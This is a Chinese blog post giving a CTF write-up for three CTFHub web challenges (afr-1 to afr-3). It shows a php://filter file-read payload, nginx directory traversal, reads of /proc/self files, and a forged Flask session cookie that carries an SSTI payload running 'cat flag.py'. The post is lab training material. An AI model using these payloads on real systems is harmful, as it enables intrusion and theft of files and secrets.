ctfhub -afr -1 2 3

最新推荐文章于 2024-04-14 21:48:55 发布
最新推荐文章于 2024-04-14 21:48:55 发布
阅读量1.1k 收藏 4
点赞数 1
文章标签: php nginx 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57954651/article/details/127919911
版权

afr-1

 打开题目链接

默认的传参数据为 ?p=hello

更改一下试试看  ?p=111  无回显

?p=flag  回显了  no no no

 想到了 php任意文件读取

?p=php://filter/read=convert.base64-encode/resource=flag

 回显出数据

 应该是base64  拿去解码

得到flag 

afr-2

打开题目链接

 查看源代码 

nginx配置问题导致存在目录穿越    访问它的前一个目录  img../

/img../flag  

得到flag  

afr-3

打开题目链接  (看似为XSS   ?)

传入个数据看看   打破最初的猜想

点击article 

 name参数是个点  利用这个name参数获取当前执行系统命令  读取系统文件 

补充(Linux系统上的/proc目录是一种文件系统  即proc文件系统  与其它常见的文件系统不同的是  /proc是一种伪文件系统(也即虚拟文件系统) 存储的是当前内核运行状态的一系列特殊文件  用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息  甚至可以通过更改其中某些文件来改变内核的运行状态
/proc/[pid]  当查看当前进程的时候可以用/proc/self代替
cmdline — 启动当前进程的完整命令  但僵尸进程目录中的此文件不包含任何信息
cwd — 指向当前进程运行目录的一个符号链接
environ — 当前进程的环境变量列表  彼此间用空字符(NULL)隔开  变量用大写字母表示  其值用小写字母表示)

任意文件读取漏洞    读取到结果  看到当前目录存在的两个文件  flag.py和key.py

白盒测试

<h1>Article Content:</h1> <br>#!/usr/bin/python
import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session
 
app = Flask(__name__)
execfile('flag.py')
execfile('key.py')
 
FLAG = flag
app.secret_key = key
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)
 
@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")
@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    if page.find('flag')>=0:
        page = 'notallowed.txt'
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e
 
    return render_template('article.html', template=template)
 
if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=False)

发现flag在flag.py   flask的appkey在key.py  但是此处任意文件读取漏洞被过滤了关键词flag

构造payload  先访问flag.py  无果

伪造session  先获取一下key

 再访问 key.py

 利用flask-session-manage 伪造session

./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YD97iA.kUHfV05dXGFmHNS5bumL3yu4J2E

抓包  更换cookie session

 得到flag   n1book{afr_3_solved}

小结:

A: php任意文件读取

B: nginx配置之目录穿越 

C:/porc目录

D:flask-session

:Carmelo Anthony
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ISO639-2.docx
06-16
例如,阿非利卡语(Afrikaans)的ISO 639-2代码是“afr”,而在ISO 639-1中,它的代码是“af”。这允许开发者在不同环境下灵活地识别和处理语言。 标准中还列出了多种语言,如阿非利坎语、阿瓦语、阿布哈兹语、阿伊...
afr-f1.github.io
03-27
【标题】"afr-f1.github.io"是一个GitHub托管的个人或组织的网站项目,通常用于展示个人作品、博客文章或者开源项目的文档。这个标题暗示了这是一个基于静态页面生成的项目,很可能使用了GitHub Pages服务。 【描述...
ctfhub afr-2
weixin_63810302的博客
09-28 993
ctfhub afr-2
[第一章 web入门]afr_1
qq_43618536的博客
07-24 820
[第一章 web入门]afr_1
afr_1
weixin_45711265的博客
01-09 391
buuctf N1book ok,让我们继续看看 buuctf N1book afr_1 任意文件读取 打开靶机,发现url上有提示"p="为任意文件读取,利用php伪协议php://filter/read=convert.base64-encode/resource=index.php ?p=php://filter/read=convert.base64-encode/resource=flag(此时无后缀,因为原题p=hello无后缀,猜测后台添加后缀) 得到PD9waHAKZGllKCdubyBu
CTFHUBafr-1&afr-2&sql注入
最新发布
2301_80115024的博客
04-14 350
打开实例后,发现传参为/?p=hello试着更改传参,获得回显, /?p=flag无回显没其他思路了,看看题目上有提示,需要通过文件读取漏洞求解得到一长串base64码,解码得到flag:n1book{afr_1_solved}
BUUCTF[第一章 web入门]afr_1
hivjianxian的博客
11-22 528
ctf题解
afr-example-weather-station:该示例演示了使用Amazon FreeRTOS的IoT库实现气象站的实现
03-18
适用于PSoC 6 MCU的AWS IoT和FreeRTOS:气象站 本示例演示了使用PSoC:registered:6 MCU和ModusToolbox:registered:FreeRTOS SDK的AWS IoT Weather Station。... IAR C / C ++编译器v8.42.2( IAR ) 支持的套件 ( C
士研电机液面控制器AFR-1说明书.pdf
09-11
士研电机液面控制器AFR-1说明书pdf,士研电机液面控制器AFR-1说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
AFR1:改写AFR
03-19
2. **数据读取**:可能需要从传感器或其他数据源读取AFR数据,这可能涉及使用VBA的文件I/O函数,如`Open`、`Input`和`Close`。 3. **逻辑控制**:根据AFR的值,可能需要执行不同的操作,如调整喷油量。这会涉及到`...
《从0到1:CTFer成长之路》afr_3
ZhShy
01-16 1084
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
CTFHub-Web-信息泄露
1stPeak's Blog
07-27 406
文章目录目录遍历PHPINFO网站源码bak文件vim缓存.DS_StoreGit泄露-Log(环境有问题)Git泄露-Stash(环境有问题)Git泄露-IndexSVN泄露HG泄露 目录遍历 解题方法 第一种:一个一个点 第二种:python脚本 import requests url = "URL" for i in range(1,5): for j in range(1,5): req = url + "/" + str(i) + "/" + str(j)
[第一章 web入门]afr_3
2202_75361164的博客
04-04 801
任意文件读取,session伪造+ssti。 可以发现secret_key在key.py,flag在flag.py里面 并且,/n1page路由下面有ssti注入,注入的数据刚好是session
i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞
AAAAAAAAAAAA66的博客
11-20 853
知识面决定攻击的广度,知识链决定攻击的深度。 最近尝试了一下挖洞,捣鼓了一天还是啥都没有,没有头绪后,还是去写点CTF题,扩充下知识面,2个方向算是互补吧。 工具 dirsearch(目录扫描工具) 火狐 hackbar 知识点 php://伪协议 php://伪协议是PHP提供的一些输入输出流访问功能,允许访问PHP的输入输出流,标准输入输出的错误描述符,内存中,磁盘备份的临时文件流,以及可以操作其他读取和写入文件资源的过滤器。 php://filter是元封装器...
CTFSHOW系列-web3(信息收集-抓包看响应头)
siu~
11-22 478
CTFSHOW系列解题思路
CTFHUB Web题解记录(信息泄露、弱口令部分)
豆傻小饼干随记
03-18 6904
以下内容只是自己做题的一个记录,不喜勿喷 一、信息泄露 1、目录遍历 这里通过观察目录的情况,发现目录都是 /flag_in_here/1/%d 的样式,于是构造脚本 #!/usr/bin/python3 # -*- coding: utf-8 -*- # --author:valecalida-- import urllib.request import urllib.re...
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 1624
三星难度Webafr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
《从0到1:CTFer成长之路》--afr_1 BUUCTF
wuyaowangchuan的博客
11-17 4014
任意文件读取漏洞 发现了?p=hello,然后页面回显了hello world 因为提示了是文件读取漏洞 没有回显 因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀 php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flag PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 n1book{afr_1_solv.
CTF比赛题看任意文件读取的危害
csd_ct的专栏
02-27 2219
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhubweb afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。 在afr-3中,任意文件读取漏洞如下,首先进入首页,如下图: 点进去,首页是个输入框,输入test,提交查询,如图: 在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url中有个name=article,这个参数,猜测这个参数是突破点,将article.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值